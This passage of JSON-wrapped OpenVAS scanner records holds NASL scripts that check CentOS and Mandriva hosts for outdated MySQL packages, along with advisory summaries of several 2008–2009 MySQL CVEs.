rpm:\"lib64mysql-static-devel~5.0.89~0.1mdvmes5\", rls:\"MNDK_mes5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n\n\nif(release == \"MNDK_2009.0\")\n{\n\n if ((res = isrpmvuln(pkg:\"libmysql15\", rpm:\"libmysql15~5.0.89~0.1mdv2009.0\", rls:\"MNDK_2009.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libmysql-devel\", rpm:\"libmysql-devel~5.0.89~0.1mdv2009.0\", rls:\"MNDK_2009.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libmysql-static-devel\", rpm:\"libmysql-static-devel~5.0.89~0.1mdv2009.0\", rls:\"MNDK_2009.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"mysql\", rpm:\"mysql~5.0.89~0.1mdv2009.0\", rls:\"MNDK_2009.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"mysql-bench\", rpm:\"mysql-bench~5.0.89~0.1mdv2009.0\", rls:\"MNDK_2009.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"mysql-client\", rpm:\"mysql-client~5.0.89~0.1mdv2009.0\", rls:\"MNDK_2009.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"mysql-common\", rpm:\"mysql-common~5.0.89~0.1mdv2009.0\", rls:\"MNDK_2009.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"mysql-doc\", rpm:\"mysql-doc~5.0.89~0.1mdv2009.0\", rls:\"MNDK_2009.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"mysql-max\", rpm:\"mysql-max~5.0.89~0.1mdv2009.0\", rls:\"MNDK_2009.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"mysql-ndb-extra\", rpm:\"mysql-ndb-extra~5.0.89~0.1mdv2009.0\", rls:\"MNDK_2009.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"mysql-ndb-management\", rpm:\"mysql-ndb-management~5.0.89~0.1mdv2009.0\", rls:\"MNDK_2009.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"mysql-ndb-storage\", rpm:\"mysql-ndb-storage~5.0.89~0.1mdv2009.0\", rls:\"MNDK_2009.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"mysql-ndb-tools\", rpm:\"mysql-ndb-tools~5.0.89~0.1mdv2009.0\", rls:\"MNDK_2009.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"lib64mysql15\", rpm:\"lib64mysql15~5.0.89~0.1mdv2009.0\", rls:\"MNDK_2009.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"lib64mysql-devel\", rpm:\"lib64mysql-devel~5.0.89~0.1mdv2009.0\", rls:\"MNDK_2009.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"lib64mysql-static-devel\", rpm:\"lib64mysql-static-devel~5.0.89~0.1mdv2009.0\", rls:\"MNDK_2009.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n", "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2019-05-29T18:40:03", "bulletinFamily": "scanner", "cvelist": ["CVE-2009-4030", "CVE-2009-4028", "CVE-2008-4098", "CVE-2008-2079", "CVE-2009-4019"], "description": "The remote host is missing an update for the ", "modified": "2019-03-15T00:00:00", "published": "2011-08-09T00:00:00", "id": "OPENVAS:1361412562310880613", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310880613", "type": "openvas", "title": "CentOS Update for mysql CESA-2010:0109 centos5 i386", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# CentOS Update for mysql CESA-2010:0109 centos5 i386\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2011 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_xref(name:\"URL\", value:\"http://lists.centos.org/pipermail/centos-announce/2010-March/016527.html\");\n script_oid(\"1.3.6.1.4.1.25623.1.0.880613\");\n script_version(\"$Revision: 14222 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-15 13:50:48 +0100 (Fri, 15 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2011-08-09 08:20:34 +0200 (Tue, 09 Aug 2011)\");\n script_tag(name:\"cvss_base\", value:\"6.8\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_xref(name:\"CESA\", value:\"2010:0109\");\n script_cve_id(\"CVE-2009-4019\", \"CVE-2009-4028\", \"CVE-2009-4030\", \"CVE-2008-2079\", \"CVE-2008-4098\");\n script_name(\"CentOS Update for mysql CESA-2010:0109 centos5 i386\");\n\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'mysql'\n package(s) announced via the referenced advisory.\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2011 Greenbone Networks GmbH\");\n script_family(\"CentOS Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/centos\", \"ssh/login/rpms\", re:\"ssh/login/release=CentOS5\");\n script_tag(name:\"affected\", value:\"mysql on CentOS 5\");\n script_tag(name:\"insight\", value:\"MySQL is a multi-user, multi-threaded SQL database server. It consists of\n the MySQL server daemon (mysqld) and many client programs and libraries.\n\n It was discovered that the MySQL client ignored certain SSL certificate\n verification errors when connecting to servers. A man-in-the-middle\n attacker could use this flaw to trick MySQL clients into connecting to a\n spoofed MySQL server. (CVE-2009-4028)\n\n Note: This fix may uncover previously hidden SSL configuration issues, such\n as incorrect CA certificates being used by clients or expired server\n certificates. This update should be carefully tested in deployments where\n SSL connections are used.\n\n A flaw was found in the way MySQL handled SELECT statements with subqueries\n in the WHERE clause, that assigned results to a user variable. A remote,\n authenticated attacker could use this flaw to crash the MySQL server daemon\n (mysqld). This issue only caused a temporary denial of service, as the\n MySQL daemon was automatically restarted after the crash. (CVE-2009-4019)\n\n When the 'datadir' option was configured with a relative path, MySQL did\n not properly check paths used as arguments for the DATA DIRECTORY and INDEX\n DIRECTORY directives. An authenticated attacker could use this flaw to\n bypass the restriction preventing the use of subdirectories of the MySQL\n data directory being used as DATA DIRECTORY and INDEX DIRECTORY paths.\n (CVE-2009-4030)\n\n Note: Due to the security risks and previous security issues related to the\n use of the DATA DIRECTORY and INDEX DIRECTORY directives, users not\n depending on this feature should consider disabling it by adding\n 'symbolic-links=0' to the '[mysqld]' section of the 'my.cnf' configuration\n file. In this update, an example of such a configuration was added to the\n default 'my.cnf' file.\n\n All MySQL users are advised to upgrade to these updated packages, which\n contain backported patches to resolve these issues. After installing this\n update, the MySQL server daemon (mysqld) will be restarted automatically.\");\n script_tag(name:\"solution\", value:\"Please install the updated packages.\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"CentOS5\")\n{\n\n if ((res = isrpmvuln(pkg:\"mysql\", rpm:\"mysql~5.0.77~4.el5_4.2\", rls:\"CentOS5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"mysql-bench\", rpm:\"mysql-bench~5.0.77~4.el5_4.2\", rls:\"CentOS5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"mysql-devel\", rpm:\"mysql-devel~5.0.77~4.el5_4.2\", rls:\"CentOS5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"mysql-server\", rpm:\"mysql-server~5.0.77~4.el5_4.2\", rls:\"CentOS5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"mysql-test\", rpm:\"mysql-test~5.0.77~4.el5_4.2\", rls:\"CentOS5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2018-01-25T10:55:13", "bulletinFamily": "scanner", "cvelist": ["CVE-2009-4030", "CVE-2009-4028", "CVE-2008-4098", "CVE-2008-2079", "CVE-2009-4019"], "description": "Check for the Version of mysql", "modified": "2018-01-24T00:00:00", "published": "2010-01-19T00:00:00", "id": "OPENVAS:1361412562310830806", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310830806", "type": "openvas", "title": "Mandriva Update for mysql MDVSA-2010:012 (mysql)", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Mandriva Update for mysql MDVSA-2010:012 (mysql)\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2010 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"Multiple vulnerabilities has been found and corrected in mysql:\n\n mysqld in MySQL 5.0.x before 5.0.88 and 5.1.x before 5.1.41 does\n not (1) properly handle errors during execution of certain SELECT\n statements with subqueries, and does not (2) preserve certain\n null_value flags during execution of statements that use the\n GeomFromWKB function, which allows remote authenticated users to\n cause a denial of service (daemon crash) via a crafted statement\n (CVE-2009-4019).\n \n The vio_verify_callback function in viosslfactories.c in MySQL\n 5.0.x before 5.0.88 and 5.1.x before 5.1.41, when OpenSSL is used,\n accepts a value of zero for the depth of X.509 certificates, which\n allows man-in-the-middle attackers to spoof arbitrary SSL-based MySQL\n servers via a crafted certificate, as demonstrated by a certificate\n presented by a server linked against the yaSSL library (CVE-2009-4028).\n \n MySQL 5.1.x before 5.1.41 allows local users to bypass certain\n privilege checks by calling CREATE TABLE on a MyISAM table with\n modified (1) DATA DIRECTORY or (2) INDEX DIRECTORY arguments\n that are originally associated with pathnames without symlinks,\n and that can point to tables created at a future time at which a\n pathname is modified to contain a symlink to a subdirectory of the\n MySQL data home directory, related to incorrect calculation of the\n mysql_unpacked_real_data_home value. NOTE: this vulnerability exists\n because of an incomplete fix for CVE-2008-4098 and CVE-2008-2079\n (CVE-2009-4030).\n \n The updated packages have been patched to correct these\n issues. Additionally for 2009.1 and 2010.0 mysql has also been upgraded\n to the latest stable 5.1 release (5.1.42).\";\n\ntag_affected = \"mysql on Mandriva Linux 2009.1,\n Mandriva Linux 2009.1/X86_64,\n Mandriva Linux 2010.0,\n Mandriva Linux 2010.0/X86_64\";\ntag_solution = \"Please Install the Updated Packages.\";\n\n\n\nif(description)\n{\n script_xref(name : \"URL\" , value : \"http://lists.mandriva.com/security-announce/2010-01/msg00053.php\");\n script_oid(\"1.3.6.1.4.1.25623.1.0.830806\");\n script_version(\"$Revision: 8510 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-01-24 08:57:42 +0100 (Wed, 24 Jan 2018) $\");\n script_tag(name:\"creation_date\", value:\"2010-01-19 08:58:46 +0100 (Tue, 19 Jan 2010)\");\n script_tag(name:\"cvss_base\", value:\"6.8\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_xref(name: \"MDVSA\", value: \"2010:012\");\n script_cve_id(\"CVE-2009-4019\", \"CVE-2009-4028\", \"CVE-2008-4098\", \"CVE-2008-2079\", \"CVE-2009-4030\");\n script_name(\"Mandriva Update for mysql MDVSA-2010:012 (mysql)\");\n\n script_tag(name: \"summary\" , value: \"Check for the Version of mysql\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2010 Greenbone Networks GmbH\");\n script_family(\"Mandrake Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/mandriva_mandrake_linux\", \"ssh/login/release\");\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"MNDK_2010.0\")\n{\n\n if ((res = isrpmvuln(pkg:\"libmysql16\", rpm:\"libmysql16~5.1.42~0.1mdv2010.0\", rls:\"MNDK_2010.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libmysql-devel\", rpm:\"libmysql-devel~5.1.42~0.1mdv2010.0\", rls:\"MNDK_2010.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libmysql-static-devel\", rpm:\"libmysql-static-devel~5.1.42~0.1mdv2010.0\", rls:\"MNDK_2010.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"mysql\", rpm:\"mysql~5.1.42~0.1mdv2010.0\", rls:\"MNDK_2010.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"mysql-bench\", rpm:\"mysql-bench~5.1.42~0.1mdv2010.0\", rls:\"MNDK_2010.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"mysql-client\", rpm:\"mysql-client~5.1.42~0.1mdv2010.0\", rls:\"MNDK_2010.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"mysql-common\", rpm:\"mysql-common~5.1.42~0.1mdv2010.0\", rls:\"MNDK_2010.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"mysql-common-core\", rpm:\"mysql-common-core~5.1.42~0.1mdv2010.0\", rls:\"MNDK_2010.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"mysql-core\", rpm:\"mysql-core~5.1.42~0.1mdv2010.0\", rls:\"MNDK_2010.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"mysql-doc\", rpm:\"mysql-doc~5.1.42~0.1mdv2010.0\", rls:\"MNDK_2010.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"mysql-max\", rpm:\"mysql-max~5.1.42~0.1mdv2010.0\", rls:\"MNDK_2010.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"mysql-ndb-extra\", rpm:\"mysql-ndb-extra~5.1.42~0.1mdv2010.0\", rls:\"MNDK_2010.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"mysql-ndb-management\", rpm:\"mysql-ndb-management~5.1.42~0.1mdv2010.0\", rls:\"MNDK_2010.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"mysql-ndb-storage\", rpm:\"mysql-ndb-storage~5.1.42~0.1mdv2010.0\", rls:\"MNDK_2010.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"mysql-ndb-tools\", rpm:\"mysql-ndb-tools~5.1.42~0.1mdv2010.0\", rls:\"MNDK_2010.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"lib64mysql16\", rpm:\"lib64mysql16~5.1.42~0.1mdv2010.0\", rls:\"MNDK_2010.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"lib64mysql-devel\", rpm:\"lib64mysql-devel~5.1.42~0.1mdv2010.0\", rls:\"MNDK_2010.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"lib64mysql-static-devel\", rpm:\"lib64mysql-static-devel~5.1.42~0.1mdv2010.0\", rls:\"MNDK_2010.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n\n\nif(release == \"MNDK_2009.1\")\n{\n\n if ((res = isrpmvuln(pkg:\"libmysql16\", rpm:\"libmysql16~5.1.42~0.1mdv2009.1\", rls:\"MNDK_2009.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libmysql-devel\", rpm:\"libmysql-devel~5.1.42~0.1mdv2009.1\", rls:\"MNDK_2009.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libmysql-static-devel\", rpm:\"libmysql-static-devel~5.1.42~0.1mdv2009.1\", rls:\"MNDK_2009.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"mysql\", rpm:\"mysql~5.1.42~0.1mdv2009.1\", rls:\"MNDK_2009.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"mysql-bench\", rpm:\"mysql-bench~5.1.42~0.1mdv2009.1\", rls:\"MNDK_2009.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"mysql-client\", rpm:\"mysql-client~5.1.42~0.1mdv2009.1\", rls:\"MNDK_2009.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"mysql-common\", rpm:\"mysql-common~5.1.42~0.1mdv2009.1\", rls:\"MNDK_2009.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"mysql-doc\", rpm:\"mysql-doc~5.1.42~0.1mdv2009.1\", rls:\"MNDK_2009.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"mysql-max\", rpm:\"mysql-max~5.1.42~0.1mdv2009.1\", rls:\"MNDK_2009.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"mysql-ndb-extra\", rpm:\"mysql-ndb-extra~5.1.42~0.1mdv2009.1\", rls:\"MNDK_2009.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"mysql-ndb-management\", rpm:\"mysql-ndb-management~5.1.42~0.1mdv2009.1\", rls:\"MNDK_2009.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"mysql-ndb-storage\", rpm:\"mysql-ndb-storage~5.1.42~0.1mdv2009.1\", rls:\"MNDK_2009.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"mysql-ndb-tools\", rpm:\"mysql-ndb-tools~5.1.42~0.1mdv2009.1\", rls:\"MNDK_2009.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"lib64mysql16\", rpm:\"lib64mysql16~5.1.42~0.1mdv2009.1\", rls:\"MNDK_2009.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"lib64mysql-devel\", rpm:\"lib64mysql-devel~5.1.42~0.1mdv2009.1\", rls:\"MNDK_2009.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"lib64mysql-static-devel\", rpm:\"lib64mysql-static-devel~5.1.42~0.1mdv2009.1\", rls:\"MNDK_2009.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n", "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2018-01-26T11:05:26", "bulletinFamily": "scanner", "cvelist": ["CVE-2009-4030", "CVE-2009-4028", "CVE-2008-4098", "CVE-2008-2079", "CVE-2009-4019"], "description": "Check for the Version of mysql", "modified": "2018-01-25T00:00:00", "published": "2010-01-19T00:00:00", "id": "OPENVAS:1361412562310830821", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310830821", "type": "openvas", "title": "Mandriva Update for mysql MDVSA-2010:011 (mysql)", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Mandriva Update for mysql MDVSA-2010:011 (mysql)\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2010 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"Multiple vulnerabilities has been found and corrected in mysql:\n\n mysqld in MySQL 5.0.x before 5.0.88 and 5.1.x before 5.1.41 does\n not (1) properly handle errors during execution of certain SELECT\n statements with subqueries, and does not (2) preserve certain\n null_value flags during execution of statements that use the\n GeomFromWKB function, which allows remote authenticated users to\n cause a denial of service (daemon crash) via a crafted statement\n (CVE-2009-4019).\n \n The vio_verify_callback function in viosslfactories.c in MySQL\n 5.0.x before 5.0.88 and 5.1.x before 5.1.41, when OpenSSL is used,\n accepts a value of zero for the depth of X.509 certificates, which\n allows man-in-the-middle attackers to spoof arbitrary SSL-based MySQL\n servers via a crafted certificate, as demonstrated by a certificate\n presented by a server linked against the yaSSL library (CVE-2009-4028).\n \n MySQL 5.1.x before 5.1.41 allows local users to bypass certain\n privilege checks by calling CREATE TABLE on a MyISAM table with\n modified (1) DATA DIRECTORY or (2) INDEX DIRECTORY arguments\n that are originally associated with pathnames without symlinks,\n and that can point to tables created at a future time at which a\n pathname is modified to contain a symlink to a subdirectory of the\n MySQL data home directory, related to incorrect calculation of the\n mysql_unpacked_real_data_home value. NOTE: this vulnerability exists\n because of an incomplete fix for CVE-2008-4098 and CVE-2008-2079\n (CVE-2009-4030).\n \n Packages for 2008.0 are provided for Corporate Desktop 2008.0\n customers.\n \n The updated packages have been patched to correct these\n issues. Additionally for 2009.0 and MES5 mysql has also been upgraded\n to the last stable 5.0 release (5.0.89).\";\n\ntag_affected = \"mysql on Mandriva Linux 2008.0,\n Mandriva Linux 2008.0/X86_64,\n Mandriva Linux 2009.0,\n Mandriva Linux 2009.0/X86_64,\n Mandriva Enterprise Server 5,\n Mandriva Enterprise Server 5/X86_64\";\ntag_solution = \"Please Install the Updated Packages.\";\n\n\n\nif(description)\n{\n script_xref(name : \"URL\" , value : \"http://lists.mandriva.com/security-announce/2010-01/msg00052.php\");\n script_oid(\"1.3.6.1.4.1.25623.1.0.830821\");\n script_version(\"$Revision: 8528 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-01-25 08:57:36 +0100 (Thu, 25 Jan 2018) $\");\n script_tag(name:\"creation_date\", value:\"2010-01-19 08:58:46 +0100 (Tue, 19 Jan 2010)\");\n script_tag(name:\"cvss_base\", value:\"6.8\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_xref(name: \"MDVSA\", value: \"2010:011\");\n script_cve_id(\"CVE-2009-4019\", \"CVE-2009-4028\", \"CVE-2008-4098\", \"CVE-2008-2079\", \"CVE-2009-4030\");\n script_name(\"Mandriva Update for mysql MDVSA-2010:011 (mysql)\");\n\n script_tag(name: \"summary\" , value: \"Check for the Version of mysql\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2010 Greenbone Networks GmbH\");\n script_family(\"Mandrake Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/mandriva_mandrake_linux\", \"ssh/login/release\");\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"MNDK_2008.0\")\n{\n\n if ((res = isrpmvuln(pkg:\"libmysql15\", rpm:\"libmysql15~5.0.45~8.4mdv2008.0\", rls:\"MNDK_2008.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libmysql-devel\", rpm:\"libmysql-devel~5.0.45~8.4mdv2008.0\", rls:\"MNDK_2008.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libmysql-static-devel\", rpm:\"libmysql-static-devel~5.0.45~8.4mdv2008.0\", rls:\"MNDK_2008.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"mysql\", rpm:\"mysql~5.0.45~8.4mdv2008.0\", rls:\"MNDK_2008.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"mysql-bench\", rpm:\"mysql-bench~5.0.45~8.4mdv2008.0\", rls:\"MNDK_2008.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"mysql-client\", rpm:\"mysql-client~5.0.45~8.4mdv2008.0\", rls:\"MNDK_2008.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"mysql-common\", rpm:\"mysql-common~5.0.45~8.4mdv2008.0\", rls:\"MNDK_2008.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"mysql-max\", rpm:\"mysql-max~5.0.45~8.4mdv2008.0\", rls:\"MNDK_2008.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"mysql-ndb-extra\", rpm:\"mysql-ndb-extra~5.0.45~8.4mdv2008.0\", rls:\"MNDK_2008.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"mysql-ndb-management\", rpm:\"mysql-ndb-management~5.0.45~8.4mdv2008.0\", rls:\"MNDK_2008.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"mysql-ndb-storage\", rpm:\"mysql-ndb-storage~5.0.45~8.4mdv2008.0\", rls:\"MNDK_2008.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"mysql-ndb-tools\", rpm:\"mysql-ndb-tools~5.0.45~8.4mdv2008.0\", rls:\"MNDK_2008.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"lib64mysql15\", rpm:\"lib64mysql15~5.0.45~8.4mdv2008.0\", rls:\"MNDK_2008.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"lib64mysql-devel\", 